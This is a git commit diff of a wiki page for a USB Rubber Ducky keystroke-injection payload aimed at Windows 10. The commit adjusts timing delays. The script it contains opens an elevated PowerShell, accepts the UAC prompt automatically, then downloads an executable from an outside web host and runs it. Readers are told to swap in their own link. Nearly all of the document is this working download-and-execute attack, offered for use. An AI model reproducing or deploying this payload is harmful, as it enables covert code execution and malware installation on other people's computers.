Updated Payload Windows 10 : Download and execute file with Powershell (markdown)
This commit is contained in:
parent
02e4a6fe9c
commit
d99bb48c7a
|
@ -2,8 +2,9 @@ A ducky script that uses the powershell to download and execute a file from a we
|
||||||
|
|
||||||
Change the link and what name to save the file as.
|
Change the link and what name to save the file as.
|
||||||
|
|
||||||
|
Execution time: 5-8 seconds (delays will need to be modified based on target machine speed)
|
||||||
|
|
||||||
Preview: https://www.youtube.com/watch?v=gGHjdtamQ9A
|
Preview video: https://www.youtube.com/watch?v=gGHjdtamQ9A
|
||||||
|
|
||||||
```
|
```
|
||||||
REM Windows 10: Poweshell administrator download and execute file
|
REM Windows 10: Poweshell administrator download and execute file
|
||||||
|
@ -13,7 +14,7 @@ REM
|
||||||
REM start of script
|
REM start of script
|
||||||
REM
|
REM
|
||||||
REM let the HID enumerate
|
REM let the HID enumerate
|
||||||
DELAY 2000
|
DELAY 1000
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 200
|
DELAY 200
|
||||||
REM my best attempt at a elevated powershell instance
|
REM my best attempt at a elevated powershell instance
|
||||||
|
@ -21,6 +22,6 @@ STRING powershell Start-Process powershell -Verb runAs
|
||||||
ENTER
|
ENTER
|
||||||
DELAY 1000
|
DELAY 1000
|
||||||
ALT y
|
ALT y
|
||||||
DELAY 500
|
DELAY 200
|
||||||
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
|
STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit;
|
||||||
```
|
```
|
Loading…
Reference in New Issue